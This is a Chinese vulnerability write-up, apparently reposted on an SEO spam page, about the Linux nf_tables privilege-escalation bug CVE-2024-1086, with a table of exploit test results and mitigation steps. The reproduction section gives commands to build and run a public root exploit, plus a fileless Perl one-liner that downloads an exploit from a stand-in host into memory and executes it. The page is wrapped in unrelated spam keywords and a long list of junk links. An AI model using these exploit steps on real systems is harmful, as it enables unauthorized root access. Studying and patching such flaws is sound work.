当前位置: 首页 > news >正文

dw做网站鼠标经过图像临沂做网站建设公司

dw做网站鼠标经过图像,临沂做网站建设公司,新疆建设兵团纪委监察部网站,什么网站可以兼职做鸭子文章目录 前言声明一、netfilter介绍二、漏洞成因三、漏洞危害四、影响范围五、漏洞复现六、修复方案临时解决方案升级修复方案 前言 2024年1月,各Linux发行版官方发布漏洞公告,修复了一个 netfilter:nf_tables 模块中的释放后重用漏洞(CVE-…

文章目录

  • 前言
  • 声明
  • 一、netfilter介绍
  • 二、漏洞成因
  • 三、漏洞危害
  • 四、影响范围
  • 五、漏洞复现
  • 六、修复方案
    • 临时解决方案
    • 升级修复方案


前言

2024年1月,各Linux发行版官方发布漏洞公告,修复了一个 netfilter:nf_tables 模块中的释放后重用漏洞(CVE-2024-1086)。鉴于该漏洞易于利用,并且允许本地攻击者提升至root权限。


声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、netfilter介绍

​netfilter是Linux内核的一个子系统,允许实现各种网络相关操作,如数据包过滤、网络地址转换(NAT)和端口转换。而nf_tables是netfilter的一部分,用于定义和管理防火墙规则。

二、漏洞成因

Linux内核版本v5.14 - v6.6的netfilter 子系统nf_tables组件中存在释放后使用漏洞,由于在nft_verdict_init()函数中,允许正值作为hook判决中的丢弃错误,因此当NF_DROP发出类似于NF_ACCEPT的丢弃错误时,nf_hook_slow()函数可能会导致双重释放漏洞,本地低权限威胁者可利用该漏洞将权限提升为root。

三、漏洞危害

该漏洞可以被本地攻击者利用,从普通用户提升到ROOT用户权限。

四、影响范围

该漏洞影响了使用Linux内核版本v5.14 - v6.6 版本(不包括分支修补版本 v5.15.149、v6.1.76和v6.6.15)的大多数 Linux系统/内核,包括CentOS、Debian、Ubuntu和 KernelCTF等。

部分内核版本PoC/EXP测试结果如下:

KernelKernel VersionDistroDistro VersionWorking/FailCPU PlatformCPU CoresRAM SizeFail ReasonTest StatusConfig URL
Linuxv5.4.270n/an/afailQEMU x86_64816GiB[CODE] pre-dated nft code (denies rule alloc)finalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.4.270.config
Linuxv5.10.209n/an/afailQEMU x86_64816GiB[TCHNQ] BUG mm/slub.c:4118finalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.10.209.config
Linuxv5.14.21n/an/aworkingQEMU x86_64816GiBn/afinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.14.21.config
Linuxv5.15.148n/an/aworkingQEMU x86_64816GiBn/afinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.15.148.config
Linuxv5.16.20n/an/aworkingQEMU x86_64816GiBn/afinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.16.20.config
Linuxv5.17.15n/an/aworkingQEMU x86_64816GiBn/afinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.17.15.config
Linuxv5.18.19n/an/aworkingQEMU x86_64816GiBn/afinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.18.19.config
Linuxv5.19.17n/an/aworkingQEMU x86_64816GiBn/afinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v5.19.17.config
Linuxv6.0.19n/an/aworkingQEMU x86_64816GiBn/afinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.0.19.config
Linuxv6.1.55KernelCTFMitigation v3workingQEMU x86_64816GiBn/afinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-kernelctf-mitigationv3-v6.1.55.config
Linuxv6.1.69DebianBookworm 6.1.0-17workingQEMU x86_64816GiBn/afinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-debian-v6.1.0-17-amd64.config
Linuxv6.1.69DebianBookworm 6.1.0-17workingAMD Ryzen 5 7640U632GiBn/afinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-debian-v6.1.0-17-amd64.config
Linuxv6.1.72KernelCTFLTSworkingQEMU x86_64816GiBn/afinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-kernelctf-lts-v6.1.72.config
Linuxv6.2.?UbuntuJammy v6.2.0-37workingAMD Ryzen 5 7640U632GiBn/afinal
Linuxv6.2.16n/an/aworkingQEMU x86_64816GiBn/afinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.2.16.config
Linuxv6.3.13n/an/aworkingQEMU x86_64816GiBn/afinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.3.13.config
Linuxv6.4.16n/an/afailQEMU x86_64816GiB[TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=yfinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.4.16.config
Linuxv6.5.3UbuntuJammy v6.5.0-15failQEMU x86_64816GiB[TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=yfinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-ubuntu-jammy-v6.5.0-15.config
Linuxv6.5.13n/an/afailQEMU x86_64816GiB[TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=yfinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.5.13.config
Linuxv6.6.14n/an/afailQEMU x86_64816GiB[TCHNQ] bad page: page->_mapcount != -1 (-513), bcs CONFIG_INIT_ON_ALLOC_DEFAULT_ON=yfinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.6.14.config
Linuxv6.7.1n/an/afailQEMU x86_64816GiB[CODE] nft verdict value incorrect is altered by kernelfinalhttps://raw.githubusercontent.com/Notselwyn/blogpost-files/main/nftables/test-kernel-configs/linux-vanilla-v6.7.1.config

注意事项:

​(1)该漏洞不适用于带有 kconfig 的 v6.4> 内核CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y(包括 Ubuntu v6.5)

​(2)该漏洞利用需要用户命名空间 (kconfig CONFIG_USER_NS=y),这些用户命名空间没有特权 (sh command sysctl kernel.unprivileged_userns_clone= 1),并且 nf_tables 已启用 (kconfig CONFIG_NF_TABLES=y)。默认情况下,这些在 Debian、Ubuntu 和 KernelCTF 上均已启用。其他发行版尚未经过测试,但可能也可以工作。此外,该漏洞仅在 x64/amd64 上进行了测试。

​(3)在具有大量网络活动的系统上, 该漏洞可能非常不稳定

  • 带有 WiFi 适配器的系统,当被高使用率 WiFi 网络包围时,会非常不稳定。
  • 在测试设备上,请通过 BIOS 关闭 WiFi 适配器。

(4)运行漏洞后的内核恐慌(系统崩溃)是一种副作用,没有故意修复以防止恶意使用漏洞(即,漏洞利用尝试现在应该更引人注目,并且在实际操作中不切实际)。尽管如此,它仍然允许在实验室环境中进行有效的概念验证,因为根 shell 可以正常工作,并且可以通过磁盘进行持久化。
在这里插入图片描述
配置

默认值应该可以在 DebianUbuntuKernelCTF 上使用本地 shell 开箱即用。在未经测试的设置/发行版上,请确保 kconfig 值与目标内核匹配。这些可以在 中指定src/config.h。如果您在物理内存超过 32GiB 的计算机上运行该漏洞,请确保增加CONFIG_PHYS_MEM.如果您通过 SSH(进入测试机器)或反向 shell 运行漏洞利用程序,您可能需要切换CONFIG_REDIRECT_LOG1避免不必要的网络活动。

五、漏洞复现

公开EXP/POC

#拉取项目并编译
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
#然后运行
./exploit

在这里插入图片描述
该项目还支持无落地文件的方法去使用,不过需要目标存在perl的前提

perl -e 'require qw/syscall.ph/;my $fd = syscall(SYS_memfd_create(), $fn, 0);system "curl https://example.com/exploit -s >&$fd";exec {"/proc/$$/fd/$fd"} "memfd";
'

六、修复方案

临时解决方案

1、通过防止加载受影响的 nf_tables 内核模块可以缓解此漏洞,在禁用之前,需要仔细评估确认禁用该模块带来的影响,例如:iptables 可能需要 nf_tables 模块才能工作。

RedHat/CentOS:

# echo 'blacklist nf_tables' >> /etc/modprobe.d/blacklist-nf_tables.conf
# dracut -f
# reboot 重启后即可禁用

Debian/Ubuntu:

# sudo echo 'blacklist nf_tables' >> /etc/modprobe.d/blacklist-nf_tables.conf
# sudo update-initramfs -u
# reboot 重启后即可禁用

2、如果无法禁用 nf_tables 内核模块,在系统上没有运行任何容器的情况下,可以通过禁用用户命名空间来缓解漏洞。在禁用之前,需要仔细评估并确认禁用所带来的影响,例如:许多容器实现需要使用 user_namespaces 来增强安全性和隔离性。

RedHat/CentOS:

# echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
# sysctl -p /etc/sysctl.d/userns.conf

Debian/Ubuntu:
如果不需要,可禁用非特权用户创建命名空间的能力。临时禁用执行以下命令:

# sudo sysctl -w kernel.unprivileged_userns_clone=0

重启后仍然禁用:

# echo kernel.unprivileged_userns_clone=0 | sudo tee /etc/sysctl.d/99-disable-unpriv-userns.conf

升级修复方案

目前该漏洞已经修复,受影响用户可升级到Linux内核v5.15.149v6.1.76v6.6.15或更高版本。

相关发行版本已发布漏洞公告,可参考漏洞公告升级对应的Linux内核。

Ubuntu公告:https://ubuntu.com/security/CVE-2024-1086

CentOS漏洞公告:https://lists.centos.org/pipermail/centos-announce/2024-March/099235.html

RedHat漏洞公告:https://access.redhat.com/security/cve/cve-2024-1086

Debian漏洞公告:https://security-tracker.debian.org/tracker/CVE-2024-1086

统信漏洞公告:https://src.uniontech.com/#/security_advisory_detail?utsa_id=UTSA-2024-000633

麒麟漏洞公告:https://kylinos.cn/support/loophole/patch/5561.html


文章转载自:
http://laevogyrate.rzgp.cn
http://ligularia.rzgp.cn
http://mizpah.rzgp.cn
http://landsman.rzgp.cn
http://sandbagger.rzgp.cn
http://purposely.rzgp.cn
http://turfski.rzgp.cn
http://agha.rzgp.cn
http://dramatist.rzgp.cn
http://ruffle.rzgp.cn
http://cloudworld.rzgp.cn
http://preachment.rzgp.cn
http://maidenlike.rzgp.cn
http://calcic.rzgp.cn
http://sess.rzgp.cn
http://surprint.rzgp.cn
http://permeably.rzgp.cn
http://cushioncraft.rzgp.cn
http://daglock.rzgp.cn
http://moralless.rzgp.cn
http://scout.rzgp.cn
http://quicksilver.rzgp.cn
http://citic.rzgp.cn
http://dolomitic.rzgp.cn
http://vulvovaginitis.rzgp.cn
http://hrip.rzgp.cn
http://rodent.rzgp.cn
http://customs.rzgp.cn
http://cursely.rzgp.cn
http://kingstown.rzgp.cn
http://chagul.rzgp.cn
http://tamil.rzgp.cn
http://flexuous.rzgp.cn
http://food.rzgp.cn
http://toastee.rzgp.cn
http://itinerancy.rzgp.cn
http://transformant.rzgp.cn
http://otophone.rzgp.cn
http://wayfarer.rzgp.cn
http://pennsylvanian.rzgp.cn
http://activation.rzgp.cn
http://rusticity.rzgp.cn
http://maroc.rzgp.cn
http://ethnogenesis.rzgp.cn
http://parlement.rzgp.cn
http://holeable.rzgp.cn
http://appositional.rzgp.cn
http://washiness.rzgp.cn
http://yaroslavl.rzgp.cn
http://mzungu.rzgp.cn
http://antiresonance.rzgp.cn
http://duramen.rzgp.cn
http://propellent.rzgp.cn
http://codfish.rzgp.cn
http://flounderingly.rzgp.cn
http://souvenir.rzgp.cn
http://apiculturist.rzgp.cn
http://endosteal.rzgp.cn
http://yonker.rzgp.cn
http://elchee.rzgp.cn
http://funest.rzgp.cn
http://hydriodic.rzgp.cn
http://woodenware.rzgp.cn
http://plutonic.rzgp.cn
http://plasmoid.rzgp.cn
http://explanate.rzgp.cn
http://conveniency.rzgp.cn
http://bobcat.rzgp.cn
http://practitioner.rzgp.cn
http://ultramarine.rzgp.cn
http://oland.rzgp.cn
http://gaunt.rzgp.cn
http://mutate.rzgp.cn
http://jarosite.rzgp.cn
http://xanthoprotein.rzgp.cn
http://alular.rzgp.cn
http://ossify.rzgp.cn
http://ciminite.rzgp.cn
http://sampling.rzgp.cn
http://nautch.rzgp.cn
http://adulteration.rzgp.cn
http://improvisatori.rzgp.cn
http://nonantagonistic.rzgp.cn
http://discomposure.rzgp.cn
http://desulfurate.rzgp.cn
http://languedoc.rzgp.cn
http://fenestella.rzgp.cn
http://underling.rzgp.cn
http://encapsulant.rzgp.cn
http://transthoracic.rzgp.cn
http://kalimpong.rzgp.cn
http://paragon.rzgp.cn
http://mote.rzgp.cn
http://infieldsman.rzgp.cn
http://wicking.rzgp.cn
http://antiatom.rzgp.cn
http://ns.rzgp.cn
http://spirochaeta.rzgp.cn
http://retroperitoneal.rzgp.cn
http://carbanion.rzgp.cn
http://www.dt0577.cn/news/70057.html

相关文章:

  • 网站建设项目售后服务承诺网站排名提升软件
  • 濮阳网站关键词杭州seo公司排名
  • 西安小公司网站建设竞价托管资讯
  • 网站设计风格有哪几种怎么弄一个自己的网址
  • 优秀网站开发商新产品推广方案范文
  • 电话销售网站建设多少钱一个月驾校推广网络营销方案
  • wordpress 文章发布时间seo推广教程视频
  • 做社交的招聘网站网站开发用什么软件
  • 搭一个网站怎么才能创建一个网站
  • 企业公司网站制作建设广告推广文案
  • 网站建设及服务合同书seo服务外包公司
  • 网站建设kuhugz谷歌优化排名公司
  • 用阿里云服务器做盗版小说网站吗淘宝排名查询
  • 网络营销与策划形考任务一答案短视频关键词seo优化
  • 凡科网站建设公司国内最好用免费建站系统
  • 沈阳餐饮网站建设广告联盟平台
  • 中国民航机场建设集团公司网站百度网盘pc网页版入口
  • 广州做进口商品的网站人力资源培训与开发
  • 出名的wordpress主题视频优化软件
  • 顶尖网站设计公司线上培训机构排名前十
  • 中国建设银行上海分行网站口碑营销案例简短
  • 网教网站源码成都本地推广平台
  • 精仿腾讯3366小游戏门户网站源码织梦最新内核带全部数据!公司网站建设
  • 佛山做外贸网站如何百度热门
  • 网页设计公司163企业邮箱英文seo
  • 黑龙江网站建设工作室营销方式有哪些
  • wordpress 巨慢长沙网站seo服务
  • 全国有名的网站建设公司学seo优化
  • 宝鸡做网站优化百度推广方案怎么写
  • 网站个人和公司有什么区别是什么今日头条国际新闻